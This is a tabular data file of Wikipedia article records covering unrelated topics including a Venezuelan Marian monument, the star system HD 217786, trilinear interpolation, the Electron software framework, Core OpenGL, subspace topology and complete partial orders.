Columns: id (int64, 580–79M), url (string, 31–175 chars), text (string, 9–245k chars), source (string, 1–109 chars), categories (string, 160 classes), token_count (int64, 3–51.8k)
64,080,299
https://en.wikipedia.org/wiki/Monumento%20a%20la%20Virgen%20de%20la%20Paz
The Monumento a la Virgen de la Paz is a colossal statue honoring Mary. Made entirely of concrete, it is located southwest of the city of Trujillo in Venezuela. It is the 48th-tallest statue in the world, the tallest statue in South America and the second-tallest in the Americas, the fourth-tallest statue depicting a woman in the world, and the second-tallest statue of Mary in the world. It weighs 1,200 tonnes. It was designed by the Spanish-Venezuelan sculptor Manuel de la Fuente and opened on 21 December 1983 by President Luis Herrera Campins. The monument stands high above sea level in the region named Peña de la Virgen, where it is said that the virgin appeared in the year 1570. From the monument there are spectacular panoramic views of the region: on a clear day, one can see all of the state of Trujillo, parts of the Sierra Nevada de Mérida, and the south coast of Lake Maracaibo. Since 1568 the virgin of Nuestra Señora de la Paz (Our Lady of Peace) has been the spiritual patron of Trujillo; since 1960 she has been the patron of this diocese, as well. The dove in the statue's right hand symbolizes the responsibility of the presidency of Venezuela to make peace across the land. For many years the statue was administered through a private foundation, before passing to the directorship of the government of the state of Trujillo. Despite its colossal size and the importance of its commemorative symbolism of the patron saint of the state, the monument is one of the least visited tourist spots in Trujillo and in Venezuela. In Easter 2010 the Trujillo government reported 11,000 visitors to the monument, while the José Gregorio Hernández sanctuary received close to 80,000 visits, and the traditional way of the cross in the town of Tostós was visited by approximately 57,000 tourists. History The Trujillo area has figured in the Christian mystical beliefs of the inhabitants of the surrounding lands since colonial times. The Virgin of Peace is the patron saint of the state of Trujillo, and the state flag has a green triangle with a white star at its center and, inside the star, the silhouette of a dove, a symbol of peace. The three sides of the triangle represent a triad of monuments, two of them religious: the national monument of the Meeting of Bolívar and Morillo in Santa Ana, on the occasion of the Treaty of Armistice and Regularization of War; the Cathedral Señor Santiago de Nuestra Señora de La Paz, finished in 1662, where the precious image of Our Lady of Peace was venerated in the 16th century (it also appears on the coat of arms of the city and the state, and is where Bishop Lasso de La Vega welcomed Bolívar and entrusted him to divine providence on 1 March 1821); and the Monumento a la Virgen de la Paz, an appeal to world peace. Virgen de la Paz The origins of the image of the Virgin of Peace probably date back to the 7th century, associated with Saint Ildefonsus of Toledo (606–667), an archbishop of Toledo, Spain, noted for his devotion to the Virgin Mary. Tradition relates that on a December night, Ildefonsus entered the Cathedral of Santa María de Toledo and witnessed a great illumination inside the temple, in which he purportedly saw the Virgin sitting in the archbishop's chair; this has been interpreted as divine approval of Ildefonsus' teachings. The area of Trujillo where the monument is now erected was inhabited by an indigenous society known as Eskuke. 
It was the site of an indigenous uprising led by the cacique Pitijoc of the Cuicas ethnic group against the Spanish colonists. The indigenous people were defeated, and Trujillo was founded in 1557, with devotion to the Virgin of Peace introduced to replace the indigenous goddess Ikake. The legend The name of the monument, the place and the Virgin all refer to the legend of her appearance. On the hill called Peña de la Virgen, according to legend from the late 1550s, the image of the Virgin Mary appeared to several residents of the town of Carmona. A young woman of singular features and youthful spirit, she appeared walking in the afternoons to buy candles for her hearth, and in a grocery store some men asked her why she was alone; she answered that she was "not alone, but with God, the sun and the stars", or "children, don't forget that I walk with God, my protector". As they followed her, the locals saw her hide behind a rock that began to spark, and discovered that she was not a mortal young woman but the Virgin Mary. Monumento a la Paz The construction of the monument began as an idea of First Lady of Venezuela Betty Urdaneta de Herrera Campins, who was from Trujillo, and the state governor Dora Maldonado de Falcón. On 21 December 1983, during the bicentennial year of the birth of Simón Bolívar, the Monumento a la Virgen de la Paz was inaugurated, with the liturgical blessing of the newly created cardinal José Alí Lebrún Moratinos. The statue shows the Virgin Mary in a blue robe, and its construction lasted 18 months, carried out by the sculptor Manuel de la Fuente and the engineer Rosendo Camargo, with the support of Juan Francisco Hernández. The monument sits on a steel structure, which includes the skeleton of the hollow concrete sculpture. Its 1,200 tonnes are spread over a height of 46 meters; the head alone weighs 8 tonnes. The cost of the monument was 9 million bolívares. Although Pope John Paul II never visited Trujillo, the dedication of the monument was attended by the Venezuelan ambassador to the Holy See, Luciano Noguera Mora, and was accompanied by a television message from the Pope that was broadcast to the Venezuelan Catholic community. In the speech that the Trujillan writer Mario Briceño Perozo gave during the dedication of the monument, he referred to the tradition of going up to the Peña de la Virgen. Cult of the Virgen de la Paz The monument demonstrates how architectural discourse can generate a synergy between natural and religious statement, leading the observer to a special state of perception of the sacred. The patronal fairs in honor of the Virgen de la Paz are held in Trujillo on 24 January, often lasting until 30 January. During the festivities, the monument is treated as one of the most religious places in the state, with masses and processions, as well as gastronomic, cultural and recreational fairs at the site; these often extend to La Plazuela and Isnotú. Dozens of parishioners also gather at the Peña de la Virgen each year for Easter, praying in the attached church. The "Peace March", which takes place every year during Easter, starts early in the morning from the headquarters of the Catholic Seminary in the city of Trujillo and ends with a mass in the monument's chapel. 
Viewpoints The monument also functions as an extraordinary viewpoint: ascending inside the statue by stairs that fill its entire interior, visitors can stop at each of five lookouts: one for each cardinal direction, and a fifth at the statue's eyes. First lookout: at the level of the Virgin's knee, 18 meters from the base, reached by a mechanical elevator. From this height you can see the city of Trujillo. Second lookout: in the left hand of the statue, 4 meters above the first; from here you can see the city of Trujillo and its surroundings, including the Llanos de Monay, the Agua Viva reservoir, Betijoque, Motatán, and rural parts of Pampanito and Isnotú. It is accessible by wide steps. Third lookout: in the right hand of the statue, 26 meters up. The Teta de Niquitao, the highest point in the state of Trujillo, can be seen from this height. Fourth lookout: at the waist of the statue, 28 meters up, which can also be reached by elevator. From here, more distant sights can be seen, including La Ceiba, the eastern shore of Lake Maracaibo, the ridges of the Sierra Nevada de Mérida, various plains and much of the land from Trujillo to the state of Lara. Fifth lookout: in the eyes of the Virgin, 44 meters up, this lookout offers the most extensive and impressive view. It is reached by more than 200 wide steps. In addition to the viewpoints, the monument includes a chapel and a bell tower, which rings out every half hour. The dome of the chapel is decorated with a stained glass window; at its center, a dove appears surrounded by luminous colors that allude to the spiritual splendor of the symbol. Cave of the Virgin of Peace Lower down the mountain than the Peña de la Virgen, to one side of the monument, there is a group of publicly accessible caves collectively known as Cuevas de la Peña de la Virgen II (Caves of the Peña de la Virgen II). Local folklore says that the caves are interconnected and that the indigenous people of the past used them not only for their religious ceremonies but also to travel through the state. Other cave complexes nearby include the Cuevas de la Peña de la Virgen I, Cueva El Zamurito and Cueva El Ronco. The movements of the Andes over the centuries have likely closed whatever connecting passageways once existed. The followers of the Virgin frequently visit these caves, often in religious processions, and leave offerings and candles at the site. See also List of tallest statues Virgin of El Panecillo Notes References External links Virgen de La Paz Trujillo Venezuela (video) 1983 in Venezuela 1983 sculptures Colossal statues Trujillo (state) Statues of the Virgin Mary Monuments and memorials in Venezuela
Monumento a la Virgen de la Paz
Physics,Mathematics
2,094
65,446,330
https://en.wikipedia.org/wiki/HD%20217786
HD 217786 is a binary star system in the equatorial constellation of Pisces. With an apparent visual magnitude of 7.78, it requires binoculars or a small telescope to view. The system's distance from the Sun has been determined from parallax measurements, and it is drifting further away with a radial velocity of +10 km/s. Kinematically, the star system belongs to the thin disk population of the Milky Way. The primary is an F-type main-sequence star with a stellar classification of F8V. It is much older than the Sun, with an estimated age of 9.4 billion years, and is spinning slowly with a projected rotational velocity of 1.2 km/s. The star has a lower proportion of heavy elements than the Sun, at 65% of the solar abundance. It has about the same mass as the Sun but a 32% larger radius. The star is radiating nearly double the luminosity of the Sun from its photosphere at an effective temperature of 5,882 K. A low-mass stellar companion at a projected separation of 155 AU was discovered in 2016. The proper motion of this co-moving object suggests it is gravitationally bound to the primary, and their orbit is being viewed edge-on. If the orbit is assumed to be circular, then the orbital period for the pair is ~6.2 Myr. No other companion stars have been detected at separations from 2.74 to 76.80 AU. The star system exhibits strong stellar flare activity in the ultraviolet. Planetary system In 2010, a superjovian planet or brown dwarf on an eccentric orbit was discovered using the radial velocity method. This object, designated component Ab, has a high eccentricity that may have been caused by interaction with the secondary star. In 2022, the inclination and true mass of HD 217786 Ab were measured via astrometry, and a second planet was discovered orbiting closer to the star. References F-type main-sequence stars Multi-star planetary systems Planetary systems with one confirmed planet Brown dwarfs Pisces (constellation) J23030822-0025465 Durchmusterung objects 217786 113834
HD 217786
Astronomy
444
674,582
https://en.wikipedia.org/wiki/Trilinear%20interpolation
Trilinear interpolation is a method of multivariate interpolation on a 3-dimensional regular grid. It approximates the value of a function at an intermediate point within the local axial rectangular prism linearly, using function data on the lattice points. Trilinear interpolation is frequently used in numerical analysis, data analysis, and computer graphics. Related methods Trilinear interpolation is the extension of linear interpolation, which operates in spaces with dimension D = 1, and bilinear interpolation, which operates with dimension D = 2, to dimension D = 3. These interpolation schemes all use polynomials of order 1, giving an accuracy of order 2, and require the 2^D = 8 adjacent pre-defined values surrounding the interpolation point. There are several ways to arrive at trilinear interpolation, which is equivalent to 3-dimensional tensor B-spline interpolation of order 1, and the trilinear interpolation operator is also a tensor product of 3 linear interpolation operators. For an arbitrary, unstructured mesh (as used in finite element analysis), other methods of interpolation must be used; if all the mesh elements are tetrahedra (3D simplices), then barycentric coordinates provide a straightforward procedure. Formulation On a periodic and cubic lattice, let xd, yd, and zd be the differences between each of x, y, z and the smaller related lattice coordinate, that is:
xd = (x − x0)/(x1 − x0), yd = (y − y0)/(y1 − y0), zd = (z − z0)/(z1 − z0)
where x0 indicates the lattice point below x, and x1 indicates the lattice point above x, and similarly for y0, y1, z0 and z1. First one interpolates along x (imagine one is "pushing" the face of the cube defined by x0 to the opposing face, defined by x1), giving:
c00 = c000(1 − xd) + c100 xd
c01 = c001(1 − xd) + c101 xd
c10 = c010(1 − xd) + c110 xd
c11 = c011(1 − xd) + c111 xd
where cijk means the function value at the lattice point (xi, yj, zk). Then one interpolates these values (along y, "pushing" from y0 to y1), giving:
c0 = c00(1 − yd) + c10 yd
c1 = c01(1 − yd) + c11 yd
Finally one interpolates these values along z (walking through a line):
c = c0(1 − zd) + c1 zd
This gives us a predicted value for the point. The result of trilinear interpolation is independent of the order of the interpolation steps along the three axes: any other order, for instance along y, then along z, and finally along x, produces the same value. Algorithm visualization The above operations can be visualized as follows: First we find the eight corners of a cube that surround our point of interest. These corners have the values c000, c100, c010, c110, c001, c101, c011, c111. Next, we perform linear interpolation between c000 and c100 to find c00, between c001 and c101 to find c01, between c011 and c111 to find c11, and between c010 and c110 to find c10. Now we do interpolation between c00 and c10 to find c0, and between c01 and c11 to find c1. Finally, we calculate the value c via linear interpolation of c0 and c1. In practice, a trilinear interpolation is identical to two bilinear interpolations combined with a linear interpolation. Alternative algorithm An alternative way to write the solution to the interpolation problem is
f(x, y, z) ≈ a0 + a1 x + a2 y + a3 z + a4 xy + a5 xz + a6 yz + a7 xyz
where the coefficients a0, …, a7 are found by solving the 8 × 8 linear system obtained by requiring that f equal the known values at the eight corners; for the unit cube this yields a0 = c000, a1 = c100 − c000, a2 = c010 − c000, a3 = c001 − c000, a4 = c110 − c010 − c100 + c000, and so on. See also Linear interpolation Bilinear interpolation Tricubic interpolation Radial interpolation Tetrahedral interpolation Spherical linear interpolation External links pseudo-code from NASA, describes an iterative inverse trilinear interpolation (given the vertices and the value of C find Xd, Yd and Zd). Paul Bourke, Interpolation methods, 1999. Contains a very clever and simple method to find trilinear interpolation that is based on binary logic and can be extended to any dimension (Tetralinear, Pentalinear, ...). Kenwright, Free-Form Tetrahedron Deformation. International Symposium on Visual Computing. Springer International Publishing, 2015. Multivariate interpolation Euclidean solid geometry
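The three-step procedure above maps directly onto code. The following minimal Python sketch is our own illustration (the function name and argument conventions are not from any particular library); it interpolates within a single grid cell given the eight corner values:

```python
def trilinear(c, xd, yd, zd):
    """Interpolate inside a unit cell.

    c[i][j][k] is the value at corner (x_i, y_j, z_k); xd, yd, zd are
    the fractional offsets of the query point within the cell, in [0, 1].
    """
    # Interpolate along x: collapse the cube to a face.
    c00 = c[0][0][0] * (1 - xd) + c[1][0][0] * xd
    c01 = c[0][0][1] * (1 - xd) + c[1][0][1] * xd
    c10 = c[0][1][0] * (1 - xd) + c[1][1][0] * xd
    c11 = c[0][1][1] * (1 - xd) + c[1][1][1] * xd
    # Interpolate along y: collapse the face to an edge.
    c0 = c00 * (1 - yd) + c10 * yd
    c1 = c01 * (1 - yd) + c11 * yd
    # Interpolate along z: collapse the edge to the point.
    return c0 * (1 - zd) + c1 * zd

# Example: f(x, y, z) = x + 2y + 4z is reproduced exactly, since trilinear
# interpolation is exact for multilinear (order-1) polynomials.
corners = [[[x + 2 * y + 4 * z for z in (0, 1)] for y in (0, 1)] for x in (0, 1)]
print(trilinear(corners, 0.5, 0.25, 0.75))  # 0.5 + 0.5 + 3.0 = 4.0
```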
Trilinear interpolation
Physics
743
2,219,552
https://en.wikipedia.org/wiki/Heavens-Above
Heavens-Above is a non-profit website developed and maintained by Chris Peat as Heavens-Above GmbH. The website is dedicated to helping people observe and track satellites orbiting the Earth without the need for optical equipment such as binoculars or telescopes. It provides detailed star charts showing the trajectory of the satellites against the background of the stars as seen during a pass. Special attention is paid to the ISS, Starlink satellites, and others. Space Shuttle missions were tracked until the program was retired in July 2011, and Iridium flares were tracked until that program was retired in May 2018. The website also offers details on currently visible comets, asteroids, and planets, along with other miscellaneous information. Sky & Telescope magazine described Heavens-Above as "the most popular website for tracking satellites." Users click on a map of the world to set their viewing location. Lists of objects, their brightness, and the time and direction to look to see those objects are given. Space stations, rockets, satellites, and space junk, as well as Sun, Moon, and planetary data, are covered. The authors also offer a freeware mobile app that shows similar information for the user's location. See also List of satellite pass predictors References External links Astronomy websites Non-profit organisations based in Germany
Heavens-Above
Astronomy
253
48,640,084
https://en.wikipedia.org/wiki/Electron%20%28software%20framework%29
Electron (formerly known as Atom Shell) is a free and open-source software framework developed and maintained by the OpenJS Foundation. The framework is designed to create desktop applications using web technologies (mainly HTML, CSS and JavaScript, although other technologies such as front-end frameworks and WebAssembly are possible) that are rendered using a version of the Chromium browser engine and a back end using the Node.js runtime environment. It also uses various APIs to enable functionality such as native integration with Node.js services and an inter-process communication module. Electron was originally built for Atom and is the main GUI framework behind several other open-source projects including GitHub Desktop, Light Table, Visual Studio Code, WordPress Desktop, and Eclipse Theia. Architecture Electron applications include a "main" process and several "renderer" processes. The main process runs the logic for the application (e.g., menus, shell commands, lifecycle events), and can then launch multiple renderer processes by instantiating the BrowserWindow class, which loads a window that appears on the screen by rendering HTML and CSS. Both the main and renderer processes can run with Node.js integration if the nodeIntegration field is set to true. Most of Electron's APIs are written in C++ or Objective-C and are exposed directly to the application code through JavaScript bindings. History In September 2021, Electron moved to an eight-week release cycle between major versions to match the release cycle of Chromium Extended Stable and to comply with a new requirement from the Microsoft Store that requires browser-based apps to be within two major versions of the latest release of the browser engine. Electron frequently releases new major versions alongside every other Chromium release. The latest three stable versions are supported by the Electron team. Usage Desktop applications built with Electron include Atom, balenaEtcher, Eclipse Theia, Microsoft Teams before 2.0, Slack, and Visual Studio Code. The Brave browser was based on Electron before it was rewritten to use Chromium directly. Reception The most common criticism of Electron is that it necessitates software bloat when used for simple programs. As a result, Michael Larabel has referred to the framework as "notorious among most Linux desktop users for being resource heavy, not integrating well with most desktops, and generally being despised." Researchers have shown that Electron's large feature set can be hijacked by bad actors with write access to the source JavaScript files. This requires root access on *nix systems and is not considered to be a vulnerability by the Electron developers. Those who are concerned that Electron is not always based on the newest version of Chromium have recommended progressive web applications as an alternative. See also References External links 2013 software Cross-platform desktop-apps development Cross-platform software Free and open-source software GitHub Google Chrome Microsoft free software Software using the MIT license
Electron (software framework)
Technology
607
62,014,670
https://en.wikipedia.org/wiki/Virtual%20Viking%20%E2%80%93%20The%20Ambush
Virtual Viking – The Ambush is a 2019 short film directed by Erik Gustavson, using volumetric video capture to create one of the first films in virtual reality. Produced for The Viking Planet centre in Oslo, Norway, the film is part of a wider exhibition of the lives of Norse seafarers and uses a number of VR headsets to enable visitors to experience a Viking longship in the heat of battle. Plot Skald recounts the story of how he was captured, in his youth, during an unsuccessful Viking raid. Cast Murray McArthur as Skald Luke White as Ulf Wolfie Hughes as Grim Christopher Rogers as Trym Ross O'Hennessy as Viking Awards and nominations At the Aesthetica Short Film Festival 2019, Virtual Viking – The Ambush was awarded Best VR Film. References External links 2019 films Norwegian short films Old Norse-language films Head-mounted displays Video game accessories Virtual reality
Virtual Viking – The Ambush
Technology
181
23,426,056
https://en.wikipedia.org/wiki/TDIQ
TDIQ (also known as 6,7-methylenedioxy-1,2,3,4-tetrahydroisoquinoline or MDTHIQ) is a drug used in scientific research, which has anxiolytic and anorectic effects in animals. It has an unusual effects profile in animals, with the effects generalising to cocaine and partially to MDMA and ephedrine; the effects do not generalise to amphetamine, and TDIQ does not have any stimulant effects. It is thought these effects are mediated via a partial agonist action at alpha-2 adrenergic receptors, and TDIQ has been suggested as a possible drug for the treatment of cocaine dependence. See also MDAI MDAT Norsalsolinol Tetrahydroisoquinoline C10H11NO2 References Alpha-2 adrenergic receptor agonists Heterocyclic compounds with 3 rings Nitrogen heterocycles Oxygen heterocycles
TDIQ
Chemistry
206
4,346,564
https://en.wikipedia.org/wiki/Core%20OpenGL
Core OpenGL, or CGL, is Apple Inc.'s Macintosh Quartz windowing system interface to the OS X implementation of the OpenGL specification. CGL is analogous to GLX, which is the X11 interface to OpenGL, as well as WGL, which is the Microsoft Windows interface to OpenGL. History All windowing system interfaces to OpenGL arose out of the migration of Silicon Graphics' proprietary 3D graphics application programming interface (API), IrisGL, to its current open standard form, OpenGL. When the decision was made to make IrisGL an open standard, the primary required design change was to make this graphics standard API windowing-system agnostic. All window system specific logic was therefore removed from IrisGL when moving to OpenGL. Window system logic includes any event mechanism for gathering input from devices such as keyboards and mice, as well as any window ordering or sizing logic used when drawing to a modern windowed user interface. Further, all internal management of window memory buffers, sometimes referred to as surfaces, was also removed from IrisGL to create OpenGL. With OpenGL windowing-system agnostic, companies such as Apple must shoulder the burden of configuring and managing the surfaces used as a destination for OpenGL rendering. Features Windowing system interfaces On OS X, CGL is the foundation layer of windowing system interfaces to OpenGL. Both AGL (Apple Graphics Library) and Cocoa (AppKit) have interfaces to OpenGL; they are logical software layers that depend on CGL for their behavior. CGL and AGL interoperate freely. CGL and Cocoa may be used together; however, Cocoa classes may implicitly make changes to CGL state. Function calls from AGL and Cocoa should not be mixed. Configuration of these surfaces is done through a pixel format selection process, where different compatible layers of rendering information are combined to form a framebuffer. Examples of such layers are color buffers, transparency (alpha) buffers, stencil buffers, and depth buffers. The CGL function CGLChoosePixelFormat is used to perform this buffer compatibility check. CGLChoosePixelFormat will, based on input parameters and their scoring policy, choose a pixel format that represents a compatible buffer configuration supported by the underlying renderer that will be used to process graphics commands. Renderers may be either hardware based, such that they correspond to graphics cards installed in the system, or they may be software based, where the main CPU of the system handles all of the graphics command processing and final rasterization work. Handling Mac OS X heterogeneity On Mac OS X, CGL is also responsible for handling the heterogeneous nature of graphics device installations and configuration on Macintosh systems. Macintosh computers may have any number of displays and graphics cards installed in them. In these configurations, the user's desktop may be virtualized (extended) or mirrored across multiple displays which are connected to multiple graphics cards which may or may not be from the same graphics vendor. Controlling the rendering When users configure their Macintosh to use a virtualized desktop, and they drag windows from one display to another, CGL handles the management of OpenGL graphics state that must be shadowed between devices to provide command processing consistency between them. Dragging a window across a Macintosh desktop between two different displays that are supported by two different renderers is known as a "Virtual Screen Change". 
CGL also provides a mechanism to obtain information about the renderer that is currently in use. The primary data structure that maintains OpenGL state on Mac OS X is a CGLContextObj. These CGL contexts can be retrieved at any time using a call to CGLGetCurrentContext. The CGLContextObj may then be queried for specifics about the renderer that is associated with it. Software renderer Also included is Apple's in-house OpenGL software renderer. Originally, this was a simple integer package. In Mac OS X 10.3, a new floating-point renderer was introduced, which ultimately replaced it. The software renderer, though slow, is fast enough for basic applications and is kept feature-complete with OS X's OpenGL implementation for development purposes. See also GLX: the equivalent X11 interface to OpenGL WGL: the equivalent Microsoft Windows interface to OpenGL AGL OpenGL GLUT: A higher level interface that hides the differences between WGL, GLX, etc. External links CGL reference guide on Apple website (HTML). CGL reference guide on Apple website (PDF). Application programming interfaces Graphics standards OpenGL
Core OpenGL
Technology
956
41,081,248
https://en.wikipedia.org/wiki/Influenza%20A%20virus%20subtype%20H6N1
Influenza A virus subtype H6N1 (A/H6N1) is a subtype of the influenza A virus. It has infected only one person, a woman in Taiwan, who recovered. Known to infect Eurasian teal, it is closely related to subtype H5N1. References Bird diseases H6N1
Influenza A virus subtype H6N1
Biology
72
910,926
https://en.wikipedia.org/wiki/Subspace%20topology
In topology and related areas of mathematics, a subspace of a topological space X is a subset S of X which is equipped with a topology induced from that of X called the subspace topology (or the relative topology, or the induced topology, or the trace topology). Definition Given a topological space (X, τ) and a subset S of X, the subspace topology on S is defined by τ_S = {S ∩ U : U ∈ τ}. That is, a subset of S is open in the subspace topology if and only if it is the intersection of S with an open set in (X, τ). If S is equipped with the subspace topology then it is a topological space in its own right, and is called a subspace of (X, τ). Subsets of topological spaces are usually assumed to be equipped with the subspace topology unless otherwise stated. Alternatively we can define the subspace topology for a subset S of X as the coarsest topology for which the inclusion map ι : S → X is continuous. More generally, suppose ι is an injection from a set S to a topological space X. Then the subspace topology on S is defined as the coarsest topology for which ι is continuous. The open sets in this topology are precisely the ones of the form ι⁻¹(U) for U open in X. S is then homeomorphic to its image in X (also with the subspace topology) and ι is called a topological embedding. A subspace S is called an open subspace if the injection ι is an open map, i.e., if the forward image of an open set of S is open in X. Likewise it is called a closed subspace if the injection ι is a closed map. Terminology The distinction between a set and a topological space is often blurred notationally, for convenience, which can be a source of confusion when one first encounters these definitions. Thus, whenever S is a subset of X, and (X, τ) is a topological space, the unadorned symbols "S" and "X" can often be used to refer both to S and X considered as two subsets of X, and also to (S, τ_S) and (X, τ) as the topological spaces, related as discussed above. So phrases such as "S is an open subspace of X" are used to mean that (S, τ_S) is an open subspace of (X, τ), in the sense used above; that is: (i) S ∈ τ; and (ii) S is considered to be endowed with the subspace topology. Examples In the following, ℝ represents the real numbers with their usual topology. The subspace topology of the natural numbers, as a subspace of ℝ, is the discrete topology. The rational numbers ℚ considered as a subspace of ℝ do not have the discrete topology ({0} for example is not an open set in ℚ because there is no open subset of ℝ whose intersection with ℚ results in only the singleton {0}). If a and b are rational, then the intervals (a, b) and [a, b] are respectively open and closed, but if a and b are irrational, then the set of all rational x with a < x < b is both open and closed. The set [0, 1] as a subspace of ℝ is both open and closed, whereas as a subset of ℝ it is only closed. As a subspace of ℝ, [0, 1] ∪ [2, 3] is composed of two disjoint open subsets (which happen also to be closed), and is therefore a disconnected space. Let S = [0, 1) be a subspace of the real line ℝ. Then [0, ½) is open in S but not in ℝ (for example, the intersection of (−½, ½) with S is [0, ½)). Likewise [½, 1) is closed in S but not in ℝ (1 is a limit point of [½, 1) in ℝ that does not belong to it). S is both open and closed as a subset of itself but not as a subset of ℝ. Properties The subspace topology has the following characteristic property. Let S be a subspace of X and let ι : S → X be the inclusion map. Then for any topological space Z, a map f : Z → S is continuous if and only if the composite map ι ∘ f is continuous. This property is characteristic in the sense that it can be used to define the subspace topology on S. 
We list some further properties of the subspace topology. In the following let S be a subspace of X. If f : X → Y is continuous then the restriction of f to S is continuous. If f : X → Y is continuous then f : X → f(X) is continuous. The closed sets in S are precisely the intersections of S with closed sets in X. If A is a subspace of S then A is also a subspace of X with the same topology. In other words the subspace topology that A inherits from S is the same as the one it inherits from X. Suppose S is an open subspace of X (so S is open in X). Then a subset of S is open in S if and only if it is open in X. Suppose S is a closed subspace of X (so S is closed in X). Then a subset of S is closed in S if and only if it is closed in X. If B is a basis for X then B_S = {U ∩ S : U ∈ B} is a basis for S. The topology induced on a subset of a metric space by restricting the metric to this subset coincides with the subspace topology for this subset. Preservation of topological properties If a topological space having some topological property implies its subspaces have that property, then we say the property is hereditary. If only closed subspaces must share the property we call it weakly hereditary. Every open and every closed subspace of a completely metrizable space is completely metrizable. Every open subspace of a Baire space is a Baire space. Every closed subspace of a compact space is compact. Being a Hausdorff space is hereditary. Being a normal space is weakly hereditary. Total boundedness is hereditary. Being totally disconnected is hereditary. First countability and second countability are hereditary. See also the dual notion quotient space product topology direct sum topology Notes References Bourbaki, Nicolas, Elements of Mathematics: General Topology, Addison-Wesley (1966) Willard, Stephen. General Topology, Dover Publications (2004) Topology General topology
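Since the subspace topology is nothing more than intersection with S, it can be checked mechanically on small finite examples. Here is a minimal Python sketch (the function and variable names are ours, purely for illustration):

```python
def subspace_topology(topology, S):
    """Given a topology (a set of frozensets) and a subset S of the space,
    return the subspace topology {S ∩ U : U in topology} on S."""
    return {frozenset(S) & U for U in topology}

# X = {1, 2, 3} with topology {∅, {1}, {1, 2}, X}.
X = frozenset({1, 2, 3})
tau = {frozenset(), frozenset({1}), frozenset({1, 2}), X}

S = frozenset({2, 3})
tau_S = subspace_topology(tau, S)
print(sorted(map(set, tau_S), key=len))
# [set(), {2}, {2, 3}]: {2} is open in S even though it is not open in X,
# because {2} = S ∩ {1, 2}.
```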
Subspace topology
Physics,Mathematics
1,182
45,285,235
https://en.wikipedia.org/wiki/Penicillium%20coffeae
Penicillium coffeae is a fungus species of the genus Penicillium which was isolated from the plant Coffea arabica L. in Hawaii. Insects play a role in spreading Penicillium coffeae. See also List of Penicillium species References Further reading coffeae Fungi described in 2005 Fungus species
Penicillium coffeae
Biology
72
572,352
https://en.wikipedia.org/wiki/Complete%20partial%20order
In mathematics, the phrase complete partial order is variously used to refer to at least three similar, but distinct, classes of partially ordered sets, characterized by particular completeness properties. Complete partial orders play a central role in theoretical computer science: in denotational semantics and domain theory. Definitions The term complete partial order, abbreviated cpo, has several possible meanings depending on context. A partially ordered set is a directed-complete partial order (dcpo) if each of its directed subsets has a supremum. (A subset of a partial order is directed if it is non-empty and every pair of elements has an upper bound in the subset.) In the literature, dcpos sometimes also appear under the label up-complete poset. A pointed directed-complete partial order (pointed dcpo, sometimes abbreviated cppo) is a dcpo with a least element (usually denoted ⊥). Formulated differently, a pointed dcpo has a supremum for every directed or empty subset. The term chain-complete partial order is also used, because of the characterization of pointed dcpos as posets in which every chain has a supremum. A related notion is that of ω-complete partial order (ω-cpo). These are posets in which every ω-chain (x1 ≤ x2 ≤ x3 ≤ …) has a supremum that belongs to the poset. The same notion can be extended to other cardinalities of chains. Every dcpo is an ω-cpo, since every ω-chain is a directed set, but the converse is not true. However, every ω-cpo with a basis is also a dcpo (with the same basis). An ω-cpo (dcpo) with a basis is also called a continuous ω-cpo (or continuous dcpo). Note that complete partial order is never used to mean a poset in which all subsets have suprema; the terminology complete lattice is used for this concept. Requiring the existence of directed suprema can be motivated by viewing directed sets as generalized approximation sequences and suprema as limits of the respective (approximative) computations. This intuition, in the context of denotational semantics, was the motivation behind the development of domain theory. The dual notion of a directed-complete partial order is called a filtered-complete partial order. However, this concept occurs far less frequently in practice, since one usually can work on the dual order explicitly. By analogy with the Dedekind–MacNeille completion of a partially ordered set, every partially ordered set can be extended uniquely to a minimal dcpo. Examples Every finite poset is directed complete. All complete lattices are also directed complete. For any poset, the set of all non-empty filters, ordered by subset inclusion, is a dcpo. Together with the empty filter it is also pointed. If the order has binary meets, then this construction (including the empty filter) actually yields a complete lattice. Every set S can be turned into a pointed dcpo by adding a least element ⊥ and introducing a flat order with ⊥ ≤ s and s ≤ s for every s in S and no other order relations. The set of all partial functions on some given set S can be ordered by defining f ≤ g if and only if g extends f, i.e. if the domain of f is a subset of the domain of g and the values of f and g agree on all inputs for which they are both defined. (Equivalently, f ≤ g if and only if f ⊆ g where f and g are identified with their respective graphs.) This order is a pointed dcpo, where the least element is the nowhere-defined partial function (with empty domain). In fact, ≤ is also bounded complete. 
This example also demonstrates why it is not always natural to have a greatest element. The set of all linearly independent subsets of a vector space V, ordered by inclusion. The set of all partial choice functions on a collection of non-empty sets, ordered by restriction. The set of all prime ideals of a ring, ordered by inclusion. The specialization order of any sober space is a dcpo. Let us use the term “deductive system” for a set of sentences closed under consequence (for defining the notion of consequence, let us use e.g. Alfred Tarski's algebraic approach). There are interesting theorems that concern a set of deductive systems being a directed-complete partial ordering. Also, a set of deductive systems can be chosen to have a least element in a natural way (so that it can also be a pointed dcpo), because the set of all consequences of the empty set (i.e. “the set of the logically provable/logically valid sentences”) is (1) a deductive system and (2) contained in all deductive systems. Characterizations An ordered set is a dcpo if and only if every non-empty chain has a supremum. As a corollary, an ordered set is a pointed dcpo if and only if every (possibly empty) chain has a supremum, i.e., if and only if it is chain-complete. Proofs rely on the axiom of choice. Alternatively, an ordered set P is a pointed dcpo if and only if every order-preserving self-map of P has a least fixpoint. Continuous functions and fixed-points A function f between two dcpos P and Q is called (Scott) continuous if it maps directed sets to directed sets while preserving their suprema: f(D) is directed for every directed D ⊆ P, and f(sup D) = sup f(D) for every directed D ⊆ P. Note that every continuous function between dcpos is a monotone function. This notion of continuity is equivalent to the topological continuity induced by the Scott topology. The set of all continuous functions between two dcpos P and Q is denoted [P → Q]. Equipped with the pointwise order, this is again a dcpo, and pointed whenever Q is pointed. Thus the complete partial orders with Scott-continuous maps form a cartesian closed category. Every order-preserving self-map f of a pointed dcpo (P, ⊥) has a least fixed-point. If f is continuous then this fixed-point is equal to the supremum of the iterates (⊥, f(⊥), f(f(⊥)), …, f^n(⊥), …) of ⊥ (see also the Kleene fixed-point theorem). Another fixed point theorem is the Bourbaki–Witt theorem, stating that if f is a function from a dcpo to itself with the property that x ≤ f(x) for all x, then f has a fixed point. This theorem, in turn, can be used to prove that Zorn's lemma is a consequence of the axiom of choice. See also Algebraic posets Scott topology Completeness Notes References Order theory
